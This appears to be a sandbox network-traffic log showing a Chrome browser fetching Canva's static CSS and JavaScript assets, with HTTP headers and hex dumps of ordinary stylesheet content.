                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 74 6f 72 20 2e 71 6c 2d 69 6e 64 65 6e 74 2d 31 2e 71 6c 2d 64 69 72 65 63 74 69 6f 6e 2d 72 74 6c 2e 71 6c 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 65 6d 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 2e 71 6c 2d 69 6e 64 65 6e 74 2d 31 2e 71 6c 2d 64 69 72 65 63 74 69 6f 6e 2d 72 74 6c 2e 71 6c 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 2e 35 65 6d 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 2e 71 6c 2d 69 6e 64 65 6e 74 2d 32 3a 6e 6f 74 28 2e 71 6c 2d 64 69 72 65 63 74 69 6f 6e 2d 72 74 6c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 36 65 6d 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 2e 71 6c 2d 69 6e 64 65 6e 74 2d 32 3a 6e 6f 74 28 2e 71 6c 2d 64 69 72 65 63 74 69 6f 6e 2d 72 74
                                                                                                                                                                                                                                                    Data Ascii: tor .ql-indent-1.ql-direction-rtl.ql-align-right{padding-right:3em}.ql-editor li.ql-indent-1.ql-direction-rtl.ql-align-right{padding-right:4.5em}.ql-editor .ql-indent-2:not(.ql-direction-rtl){padding-left:6em}.ql-editor li.ql-indent-2:not(.ql-direction-rt
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 2e 71 6c 2d 69 6e 64 65 6e 74 2d 36 3a 6e 6f 74 28 2e 71 6c 2d 64 69 72 65 63 74 69 6f 6e 2d 72 74 6c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 39 2e 35 65 6d 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 2e 71 6c 2d 69 6e 64 65 6e 74 2d 36 2e 71 6c 2d 64 69 72 65 63 74 69 6f 6e 2d 72 74 6c 2e 71 6c 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 38 65 6d 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 2e 71 6c 2d 69 6e 64 65 6e 74 2d 36 2e 71 6c 2d 64 69 72 65 63 74 69 6f 6e 2d 72 74 6c 2e 71 6c 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 39 2e 35 65 6d 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 2e 71 6c 2d 69 6e 64 65 6e 74 2d 37 3a 6e 6f 74 28 2e 71 6c 2d 64 69 72 65 63 74 69 6f 6e 2d 72 74 6c
                                                                                                                                                                                                                                                    Data Ascii: .ql-indent-6:not(.ql-direction-rtl){padding-left:19.5em}.ql-editor .ql-indent-6.ql-direction-rtl.ql-align-right{padding-right:18em}.ql-editor li.ql-indent-6.ql-direction-rtl.ql-align-right{padding-right:19.5em}.ql-editor .ql-indent-7:not(.ql-direction-rtl
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 6f 72 20 2e 71 6c 2d 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 2e 71 6c 2d 76 69 64 65 6f 2e 71 6c 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 2e 71 6c 2d 76 69 64 65 6f 2e 71 6c 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 61 75 74 6f 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 2e 71 6c 2d 62 67 2d 62 6c 61 63 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 2e 71 6c 2d 62 67 2d 72 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 36 30 30 30 30 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 2e 71 6c 2d
                                                                                                                                                                                                                                                    Data Ascii: or .ql-video{display:block;max-width:100%}.ql-editor .ql-video.ql-align-center{margin:0 auto}.ql-editor .ql-video.ql-align-right{margin:0 0 0 auto}.ql-editor .ql-bg-black{background-color:#000}.ql-editor .ql-bg-red{background-color:#e60000}.ql-editor .ql-
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC164INData Raw: 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 35 70 78 7d 0a 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 61 30 36 38 34 62 30 37 38 30 63 37 33 39 65 39 2e 76 65 6e 64 6f 72 2e 6c 74 72 2e 63 73 73 2e 6d 61 70 20 2a 2f 0a 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 75 72 63 65 6d 61 70 73 2f 61 30 36 38 34 62 30 37 38 30 63 37 33 39 65 39 2e 76 65 6e 64 6f 72 2e 6c 74 72 2e 63 73 73 2e 6d 61 70 2a 2f
                                                                                                                                                                                                                                                    Data Ascii: none;position:absolute;right:15px}/*# sourceMappingURL=a0684b0780c739e9.vendor.ltr.css.map *//*# sourceMappingURL=sourcemaps/a0684b0780c739e9.vendor.ltr.css.map*/


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.2.449746104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC589OUTGET /web/19jbs9.2447b447994aff36.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1350INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                    Content-Length: 116426
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79e7ba1b4388-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 71050
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "eaba8cc237c899055f4bf25e96192406"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:07 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:32 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: DmC2mLLdURMY0mEKVnP+a3ZiQZyYNE6S1hPMKibnWChOhy6TmP+D87EmQkJdz+oFjlvfIJMkrro=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: RB5XB854CA71WT7K
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: HUYHIzi2EHEb4MzxzKonO3MO1Eavja16
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC775INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 78 38 7a 31 4f 45 72 45 4a 5f 4b 63 35 47 4c 74 6b 5a 63 45 34 7a 6f 48 37 77 32 55 33 56 71 30 43 66 74 68 64 4a 59 5f 6e 5a 6f 2d 31 37 33 34 36 34 33 36 34 31 2d 31 2e 30 2e 31 2e 31 2d 68 62 57 6a 5f 68 64 52 70 7a 4e 48 4a 6c 62 61 68 2e 54 64 47 37 73 6b 61 38 4f 65 79 30 66 6a 5a 67 39 75 33 6d 33 44 75 4b 4a 5f 6b 41 31 6d 51 35 64 2e 49 64 70 52 72 51 79 4e 49 6a 6d 34 79 6d 57 34 47 37 47 6f 39 57 70 4b 46 57 7a 55 75 2e 7a 34 35 51 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 32 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=x8z1OErEJ_Kc5GLtkZcE4zoH7w2U3Vq0CfthdJY_nZo-1734643641-1.0.1.1-hbWj_hdRpzNHJlbah.TdG7ska8Oey0fjZg9u3m3DuKJ_kA1mQ5d.IdpRrQyNIjm4ymW4G7Go9WpKFWzUu.z45Q; path=/; expires=Thu, 19-Dec-24 21:57:21 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC613INData Raw: 2e 5f 39 34 50 34 74 41 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 74 68 65 6d 65 7b 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 76 61 72 28 2d 2d 34 68 2d 6d 5f 41 29 7d 2e 6c 69 67 68 74 7b 2d 2d 34 68 2d 6d 5f 41 3a 6c 69 67 68 74 3b 2d 2d 5a 70 61 2d 4b 41 3a 23 30 30 63 34 63 63 3b 2d 2d 65 47 56 62 6e 67 3a 23 38 62 33 64 66 66 3b 2d 2d 4d 35 5f 70 76 41 3a 23 37 37 33 31 64 38 3b 2d 2d 62 6f 4b 4b 57 67 3a 23 36 31 32 64 61 65 3b 2d 2d 6f 71 75 72 64 77 3a 72 67 62 61 28 36 34 2c 38 37 2c 31 30 39 2c 2e 30 37 29 3b 2d 2d 64 31 70 39 39 77 3a 23 66 66 66 3b 2d 2d 31 37 4c 66 48 77 3a 72 67 62 61 28 33 36 2c 34 39 2c 36 31 2c 2e 34 29 3b 2d 2d 45 67 57 67 66 67 3a 72 67 62 61 28 31 33 2c 31 38 2c 32 32 2c 30 29 3b 2d 2d 58 33 2d 2d 5a 67 3a 72 67 62 61
                                                                                                                                                                                                                                                    Data Ascii: ._94P4tA{outline:none}.theme{color-scheme:var(--4h-m_A)}.light{--4h-m_A:light;--Zpa-KA:#00c4cc;--eGVbng:#8b3dff;--M5_pvA:#7731d8;--boKKWg:#612dae;--oqurdw:rgba(64,87,109,.07);--d1p99w:#fff;--17LfHw:rgba(36,49,61,.4);--EgWgfg:rgba(13,18,22,0);--X3--Zg:rgba
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 31 35 29 3b 2d 2d 54 77 69 4c 63 67 3a 72 67 62 61 28 31 33 2c 31 38 2c 32 32 2c 30 29 3b 2d 2d 51 65 51 30 44 77 3a 23 30 64 31 32 31 36 3b 2d 2d 54 5a 4f 49 37 41 3a 72 67 62 61 28 33 36 2c 34 39 2c 36 31 2c 2e 34 29 3b 2d 2d 53 5a 4d 6b 58 41 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 31 35 29 3b 2d 2d 31 7a 65 73 45 41 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 31 35 29 3b 2d 2d 41 4d 78 52 67 77 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 32 29 3b 2d 2d 42 5a 36 30 4a 77 3a 72 67 62 61 28 36 34 2c 38 37 2c 31 30 39 2c 2e 30 37 29 3b 2d 2d 38 45 78 35 67 41 3a 23 36 31 32 64 61 65 3b 2d 2d 73 70 49 50 32 41 3a 72 67 62 61 28 33 36 2c 34 39 2c 36 31 2c 2e 34 29 3b 2d 2d 4b 74 58 6c 52 67 3a 72 67 62 61 28 31 37
                                                                                                                                                                                                                                                    Data Ascii: 15);--TwiLcg:rgba(13,18,22,0);--QeQ0Dw:#0d1216;--TZOI7A:rgba(36,49,61,.4);--SZMkXA:rgba(165,112,255,.15);--1zesEA:rgba(165,112,255,.15);--AMxRgw:rgba(165,112,255,.2);--BZ60Jw:rgba(64,87,109,.07);--8Ex5gA:#612dae;--spIP2A:rgba(36,49,61,.4);--KtXlRg:rgba(17
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 62 61 28 33 36 2c 34 39 2c 36 31 2c 2e 34 29 3b 2d 2d 54 70 35 34 56 77 3a 23 66 30 66 31 66 35 3b 2d 2d 70 66 5f 4a 52 51 3a 72 67 62 61 28 32 34 30 2c 32 34 31 2c 32 34 35 2c 2e 37 29 3b 2d 2d 79 73 35 58 47 67 3a 72 67 62 61 28 32 34 30 2c 32 34 31 2c 32 34 35 2c 30 29 3b 2d 2d 64 56 75 63 4a 77 3a 23 66 36 66 37 66 38 3b 2d 2d 75 36 56 55 4c 67 3a 72 67 62 61 28 32 34 36 2c 32 34 37 2c 32 34 38 2c 2e 37 29 3b 2d 2d 63 6d 35 4f 65 51 3a 72 67 62 61 28 32 34 36 2c 32 34 37 2c 32 34 38 2c 30 29 3b 2d 2d 43 2d 71 36 49 67 3a 23 66 66 66 3b 2d 2d 50 6a 36 47 5a 51 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 37 29 3b 2d 2d 72 36 4d 48 58 51 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 30 29 3b 2d 2d 34 52 61 53 6a 67 3a 23 66 66 66 3b 2d 2d 46 36
                                                                                                                                                                                                                                                    Data Ascii: ba(36,49,61,.4);--Tp54Vw:#f0f1f5;--pf_JRQ:rgba(240,241,245,.7);--ys5XGg:rgba(240,241,245,0);--dVucJw:#f6f7f8;--u6VULg:rgba(246,247,248,.7);--cm5OeQ:rgba(246,247,248,0);--C-q6Ig:#fff;--Pj6GZQ:hsla(0,0%,100%,.7);--r6MHXQ:hsla(0,0%,100%,0);--4RaSjg:#fff;--F6
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 30 2c 30 25 2c 31 30 30 25 2c 2e 31 35 29 3b 2d 2d 54 77 69 4c 63 67 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 30 29 3b 2d 2d 51 65 51 30 44 77 3a 23 66 66 66 3b 2d 2d 54 5a 4f 49 37 41 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 34 29 3b 2d 2d 53 5a 4d 6b 58 41 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 33 29 3b 2d 2d 31 7a 65 73 45 41 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 33 29 3b 2d 2d 41 4d 78 52 67 77 3a 72 67 62 61 28 31 36 35 2c 31 31 32 2c 32 35 35 2c 2e 32 29 3b 2d 2d 42 5a 36 30 4a 77 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 31 35 29 3b 2d 2d 38 45 78 35 67 41 3a 23 66 66 66 3b 2d 2d 73 70 49 50 32 41 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 34 29 3b 2d 2d 4b 74 58 6c 52 67 3a 72
                                                                                                                                                                                                                                                    Data Ascii: 0,0%,100%,.15);--TwiLcg:hsla(0,0%,100%,0);--QeQ0Dw:#fff;--TZOI7A:hsla(0,0%,100%,.4);--SZMkXA:rgba(165,112,255,.3);--1zesEA:rgba(165,112,255,.3);--AMxRgw:rgba(165,112,255,.2);--BZ60Jw:hsla(0,0%,100%,.15);--8Ex5gA:#fff;--spIP2A:hsla(0,0%,100%,.4);--KtXlRg:r
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 28 30 2c 30 25 2c 31 30 30 25 2c 2e 34 29 3b 2d 2d 54 70 35 34 56 77 3a 23 30 64 31 32 31 36 3b 2d 2d 70 66 5f 4a 52 51 3a 72 67 62 61 28 31 33 2c 31 38 2c 32 32 2c 2e 37 29 3b 2d 2d 79 73 35 58 47 67 3a 72 67 62 61 28 31 33 2c 31 38 2c 32 32 2c 30 29 3b 2d 2d 64 56 75 63 4a 77 3a 23 31 38 31 39 31 62 3b 2d 2d 75 36 56 55 4c 67 3a 72 67 62 61 28 32 34 2c 32 35 2c 32 37 2c 2e 37 29 3b 2d 2d 63 6d 35 4f 65 51 3a 72 67 62 61 28 32 34 2c 32 35 2c 32 37 2c 30 29 3b 2d 2d 43 2d 71 36 49 67 3a 23 31 38 31 39 31 62 3b 2d 2d 50 6a 36 47 5a 51 3a 72 67 62 61 28 32 34 2c 32 35 2c 32 37 2c 2e 37 29 3b 2d 2d 72 36 4d 48 58 51 3a 72 67 62 61 28 32 34 2c 32 35 2c 32 37 2c 30 29 3b 2d 2d 34 52 61 53 6a 67 3a 23 32 35 32 36 32 37 3b 2d 2d 46 36 46 32 4e 51 3a 72 67 62 61
                                                                                                                                                                                                                                                    Data Ascii: (0,0%,100%,.4);--Tp54Vw:#0d1216;--pf_JRQ:rgba(13,18,22,.7);--ys5XGg:rgba(13,18,22,0);--dVucJw:#18191b;--u6VULg:rgba(24,25,27,.7);--cm5OeQ:rgba(24,25,27,0);--C-q6Ig:#18191b;--Pj6GZQ:rgba(24,25,27,.7);--r6MHXQ:rgba(24,25,27,0);--4RaSjg:#252627;--F6F2NQ:rgba
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 41 3a 63 61 6c 63 28 76 61 72 28 2d 2d 7a 66 72 49 71 67 2c 20 31 29 2a 32 34 70 78 29 3b 2d 2d 6a 64 56 62 37 51 3a 63 61 6c 63 28 76 61 72 28 2d 2d 7a 66 72 49 71 67 2c 20 31 29 2a 37 32 30 70 78 29 3b 2d 2d 67 54 51 64 57 41 3a 63 61 6c 63 28 28 31 30 30 25 20 2d 20 76 61 72 28 2d 2d 6a 64 56 62 37 51 29 29 2f 32 29 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 41 5f 41 5f 45 51 2e 5f 36 4e 79 6b 72 51 2e 5f 39 6f 4e 63 37 67 7b 6d 61 72 67 69 6e 3a 32 34 70 78 20 30 7d 2e 45 59 37 41 36 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 2e 45 59 37 41 36 67 2e 66 57 42 61 61 77 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 61 75 74 6f 7d 2e 41 5f 41 5f 45 51 2e 5f 36 4e 79 6b 72 51 2e 5f 39 6f 4e 63
                                                                                                                                                                                                                                                    Data Ascii: A:calc(var(--zfrIqg, 1)*24px);--jdVb7Q:calc(var(--zfrIqg, 1)*720px);--gTQdWA:calc((100% - var(--jdVb7Q))/2);position:relative;width:100%}.A_A_EQ._6NykrQ._9oNc7g{margin:24px 0}.EY7A6g{background:#fff}.EY7A6g.fWBaaw{pointer-events:auto}.A_A_EQ._6NykrQ._9oNc
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 6d 61 78 28 32 34 70 78 2c 76 61 72 28 2d 2d 67 54 51 64 57 41 29 29 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 34 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 6d 61 78 28 32 34 70 78 2c 76 61 72 28 2d 2d 67 54 51 64 57 41 29 29 7d 2e 41 5f 41 5f 45 51 2e 5f 36 4e 79 6b 72 51 2e 4b 5a 5f 77 65 51 20 2e 73 6c 45 41 4d 67 2c 2e 41 5f 41 5f 45 51 2e 7a 48 4c 63 4b 77 2e 4b 5a 5f 77 65 51 20 2e 73 6c 45 41 4d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 38 30 70 78 7d 2e 41 5f 41 5f 45 51 2e 5f 36 4e 79 6b 72 51 2e 6e 75 47 30 55 77 20 2e 73 6c 45 41 4d 67 2c 2e 41 5f 41 5f 45 51 2e 7a 48 4c 63 4b 77 2e 6e 75 47 30 55 77 20 2e 73 6c 45 41 4d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 32 30 70
                                                                                                                                                                                                                                                    Data Ascii: padding-left:max(24px,var(--gTQdWA));padding-right:24px;padding-right:max(24px,var(--gTQdWA))}.A_A_EQ._6NykrQ.KZ_weQ .slEAMg,.A_A_EQ.zHLcKw.KZ_weQ .slEAMg{padding-bottom:80px}.A_A_EQ._6NykrQ.nuG0Uw .slEAMg,.A_A_EQ.zHLcKw.nuG0Uw .slEAMg{padding-bottom:320p
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 29 2a 32 29 7d 2e 47 57 6c 6b 7a 51 7b 68 65 69 67 68 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 35 36 70 78 7d 2e 41 5f 41 5f 45 51 2e 7a 48 4c 63 4b 77 2e 5f 39 6f 4e 63 37 67 20 2e 47 57 6c 6b 7a 51 7b 6c 65 66 74 3a 63 61 6c 63 28 35 30 25 20 2b 20 76 61 72 28 2d 2d 6a 64 56 62 37 51 29 2f 32 29 3b 74 6f 70 3a 63 61 6c 63 28 76 61 72 28 2d 2d 33 32 5f 42 33 67 29 20 2b 20 76 61 72 28 2d 2d 73 35 50 74 49 41 29 29 7d 2e 41 5f 41 5f 45 51 2e 5f 36 4e 79 6b 72 51 2e 5f 39 6f 4e 63 37 67 20 2e 47 57 6c 6b 7a 51 7b 6c 65 66 74 3a 63 61 6c 63 28 35 30 25 20 2b 20 76 61 72 28 2d 2d 6a 64 56 62 37 51 29 2f 32 20 2b 20 76 61 72 28 2d 2d 33 32 5f 42 33 67 29 29 3b 74 6f
                                                                                                                                                                                                                                                    Data Ascii: )*2)}.GWlkzQ{height:0;overflow:visible;position:absolute;width:56px}.A_A_EQ.zHLcKw._9oNc7g .GWlkzQ{left:calc(50% + var(--jdVb7Q)/2);top:calc(var(--32_B3g) + var(--s5PtIA))}.A_A_EQ._6NykrQ._9oNc7g .GWlkzQ{left:calc(50% + var(--jdVb7Q)/2 + var(--32_B3g));to
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 63 6f 64 65 2d 72 61 6e 67 65 3a 75 2b 30 35 39 30 2d 30 35 66 66 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4e 6f 74 6f 20 53 61 6e 73 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 75 72 6c 28 69 6d 61 67 65 73 2f 64 38 33 32 32 31 65 65 36 61 36 38 34 31 62 31 37 61 37 35 34 66 36 38 62 36 63 35 61 33 64 65 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 75 2b 30 39 30 30 2d 30 39 37 66 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4e 6f 74 6f 20 53 61 6e 73
                                                                                                                                                                                                                                                    Data Ascii: code-range:u+0590-05ff}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;font-weight:400;src:url(images/d83221ee6a6841b17a754f68b6c5a3de.woff2) format("woff2");unicode-range:u+0900-097f}@font-face{font-display:swap;font-family:Noto Sans


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    3192.168.2.449747104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC571OUTGET /web/579a47f0411a508b.strings.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1356INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 7061
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79e7be6132ca-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 161184
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "7d0dbd3e6b5398f851084b652d4490b1"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:07 GMT
                                                                                                                                                                                                                                                    Last-Modified: Wed, 18 Dec 2024 00:28:23 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
